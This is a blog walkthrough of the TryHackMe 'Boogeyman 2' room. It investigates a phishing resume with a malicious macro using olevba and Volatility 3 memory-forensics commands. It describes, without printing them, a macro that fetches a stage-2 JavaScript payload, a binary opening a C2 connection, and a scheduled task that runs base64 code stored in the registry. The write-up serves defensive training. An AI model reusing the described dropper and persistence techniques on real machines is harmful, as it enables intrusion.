Boogeyman 2

Phishing Email and attachment Investigation

By Ren Sie
Posted on October 11, 2024

Refer to Boogeyman2 for the challenge room on TryHackMe

Artefacts

For the investigation, we will receive the following items:

  • A copy of the phishing email.
  • A memory dump of the victim's workstation.

Tools

$ volatility_3: An open-source framework for extracting data from RAM samples.

Note: It may take a few minutes to process the memory dump and run plugins. For details, refer to volatility 3 documentation

$ vol -f memorydump.raw <plugin>

Olevba: A tool for analyzing and extracting VBA macros from Microsoft Office documents, part of the Oletools suite.

$ olevba document.doc

Spear Phishing Human Resources

Maxine, an HR Specialist at Quick Logistics LLC, received an application for an open position. Unbeknownst to her, the attached resume was malicious and compromised her workstation.
The security team identified suspicious commands executed on Maxine's workstation, prompting an investigation. You are tasked with analyzing and assessing the impact of the compromise.

Task

What email was used to send the phishing email?
The email address is in the header.

What is the email of the victim employee?
The receiving address is also in the header.

What is the name of the attached malicious document?
The attachment name is located at the bottom of the email.

What is the MD5 hash of the malicious attachment?
First, save the file to the local machine without opening it. Next, use the md5sum command to obtain the MD5 hash value of the file.

$ md5sum <attachment>

What URL is used to download the stage 2 payload based on the document's macro?
Since the question references the document's macro, use Olevba to identify its VBA macro functionality.

$ olevba <attachment>

Note: VBA macros are automated scripts written in Visual Basic for Applications that enable users to perform repetitive tasks and manipulate data in Microsoft Office applications.

After reviewing the output, I found the file path retrieved by the macro through an HTTP GET request.

What is the name of the process that executed the newly downloaded stage 2 payload?
Continuing to examine the script, we can identify the command that executes the malicious file, including the process name.

What is the full file path of the malicious stage 2 payload?
The full file path is also in the previous screenshot.

What is the PID of the process that executed the stage 2 payload?
To identify the process ID (PID), use $ volatility with the pstree plugin on the memory dump of the affected machine. Since we already know which process ran the payload, we can use grep to search for specific keywords.

$ vol -f <memdump.raw> windows.pstree | grep -e 'process'

What is the parent PID of the process that executed the stage 2 payload?
The parent process ID (PPID) after the process ID (PID), can also be found in the previous screenshot.

What URL is used to download the malicious binary executed by the stage 2 payload?
Since the stage 2 payload (update.js) downloads and executes the malicious binary, we should examine its source code. To do this, we first need to retrieve the file by locating its offset address in the memory dump. We will use the filescan plugin along with grep to find the offset address.

$ vol -f <memdump.raw> windows.filescan | grep -e 'update'

Once we have the offset address, we can use the dumpfiles plugin to extract the file.

$ vol -f <memdump.raw> windows.dumpfiles --virtaddr 0xe58f836edc60

After retrieving the file, open it using nano or any text editor. The screenshot of the content reveals the URL hosting the malicious binary (updater.exe).

$ nano file.dat

What is the PID of the malicious process used to establish the C2 connection?
To monitor the network connection, use the netscan plugin along with the grep command to search for the malicious binary.

$ vol -f <memdump.raw> windows.netscan | grep -e 'updater.exe'

Or we can use pstree plugin along with grep command to search for the malicious binary.

$ vol -f <memdump.raw> windows.pstree | grep -e 'updater.exe'

What is the full file path of the malicious process used to establish the C2 connection?
We can use the filescan plugin along with the grep command to learn the file path.

$ vol -f <memdump.raw> windows.filescan | grep -e 'update'

What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)
The IP address and port number can be found using the `netscan` plugin, as shown in the screenshot before the last two.

$ vol -f <memdump.raw> windows.netscan | grep -e 'updater.exe'

What is the full file path of the malicious email attachment based on the memory dump?
Since we already have the file name, we can use the filescan plugin along with the grep command to learn the file path.

$ vol -f <memdump.raw> windows.filescan | grep -e 'Resume'

The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?
Since the question references the scheduled task, we can examine the memory dump file directory using the strings command along with grep to search for the keyword "schtasks".

Note: schtasks is a command-line tool in Windows that allows users to create, delete, configure, or display scheduled tasks to automate running programs or scripts at specified times or events.

Note: The PowerShell script creates a scheduled task (Updater) that runs daily at 9:00 AM. It decodes and executes a base64-encoded string retrieved from the Windows registry, specifically from a key associated with the current user’s settings.

Share: X (Twitter) Facebook LinkedIn